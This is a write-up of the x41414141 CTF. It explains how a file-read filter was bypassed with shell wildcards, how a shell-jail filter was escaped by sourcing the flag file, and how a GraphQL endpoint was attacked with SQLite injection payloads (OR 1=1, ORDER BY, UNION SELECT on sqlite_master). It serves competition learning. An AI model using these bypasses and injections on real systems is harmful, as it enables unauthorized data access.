x41414141 CTF Writeup

Blockchain-focused CTF, hosted by Offshift

Introduction

x41414141 CTF is sponsored by Offshift, and the challenge creators are the mods from John Hammond’s Discord server. I played with IrisSec.

Pin Code (Entry Challenge)

On the main page of the CTF, there is a GIF with Offshift (the sponsor)’s logo. Downloading the GIF, I run strings on it. There is one string with the word “Secret” followed by a binary string.

I take the binary number and convert it to decimal, and I can use it as a pin for the website.

File Reader (77 Solves)

hello guys, I started this new service check note.txt file for a sanity check 207.180.200.166 2324

It asks me for a file to read, and I want to read /flag.txt.

They filtered out the word flag when reading files. I could bypass this using the ? wildcard character, or by using *.

Potential Solutions

1
2
3

/????.txt
/????.???
/fl*.txt

SH Jail (36 Solves)

We get source code, showing off a filter and showing that flag.txt was marked as 555, or readable and executable.

Using this, we can bypass the filter to “run” the text file in bash and it will show the “command” or the line/flag in the file.

When we bypass the filter, our output is executed. So we can do something like this:

1

. flag.[a-z][a-z][a-z]

This will leak the flag:

1
2

flag.txt: line 1: flag{w3ll_th1s_f1l3_sh0uldnt_h4v3_fl4g_1n_2738372131}: command not found
The command has been executed. Let's go again!

flag{w3ll_th1s_f1l3_sh0uldnt_h4v3_fl4g_1n_2738372131}

Graphed 2.0 (120 Solves)

Got help from someone but i was close :(

The premise of the challenge is GraphQL-based SQLi.

First, some enumeration.

1

http://45.134.3.200:8080/graphql?query={__schema{types{name,fields{name}}}}

This got me all the information I needed about edges/nodes/options in order to enumerate further.

1
2
3
4
5
6

http://45.134.3.200:8080/graphql?query={coolNotes{body}}
http://45.134.3.200:8080/graphql?query={allNotes{edges{node{uuid,body}}}}
http://45.134.3.200:8080/graphql?query={allUsers{edges{node{uuid,%20username,%20id}}}}
http://45.134.3.200:8080/graphql?query={allUsers{edges{node{notes{edges{node{body}}}}}}}
http://45.134.3.200:8080/graphql?query={getNote{author{notes{edges{node{title}}}}}}
http://45.134.3.200:8080/graphql?query={allNotes{edges{node{title,%20body,%20id}}}} 

I went through everything, not much luck. Then someone pointed out there was a parameter query on Cool Notes, so like this:

1

{getNote(q:"query"){title, body}}

Where I return the title and body of each note that corresponds with my query.

Doing something like this:

1

{getNote(q:"'"){title, body}}

gives an sqlite 3 error. Epic, easy to do stuff from here.

Say we want to view all notes:

1

{getNote(q:"' or 1=1 or '"){title, body}}

So now we need to get the number of columns.

1
2
3
4
5

q: "' ORDER BY 1;--"
q: "' ORDER BY 2;--"
q: "' ORDER BY 3;--"
q: "' ORDER BY 4;--"
q: "' ORDER BY 5;--" - this one errored out

Now that we know that, we can do a union select to get all the table names.

Used this:

1

45.134.3.200:8080/graphql?query={getNote(q:"'or1=1unionselect1,group_concat(tbl_name),3,4FROMsqlite_master WHEREtype='table'andtbl_nameNOTlike'sqlite_%';--'"){title,body}}

Found table name العلم.

Now I can select flag from the table (just guessed/assumed to select flag)

1

http://45.134.3.200:8080/graphql?query={getNote(q:"' or 1=1 union select 1,flag,3,4 FROM العلم ;-- '"){title, body}}

I could have gotten table names though with something like this:

1

' OR 1=1 UNION SELECT 1, sql, 3, 4 from sqlite_master WHERE name='العلم'--

flag{h0p3_u_can’t_r3@d_1t9176}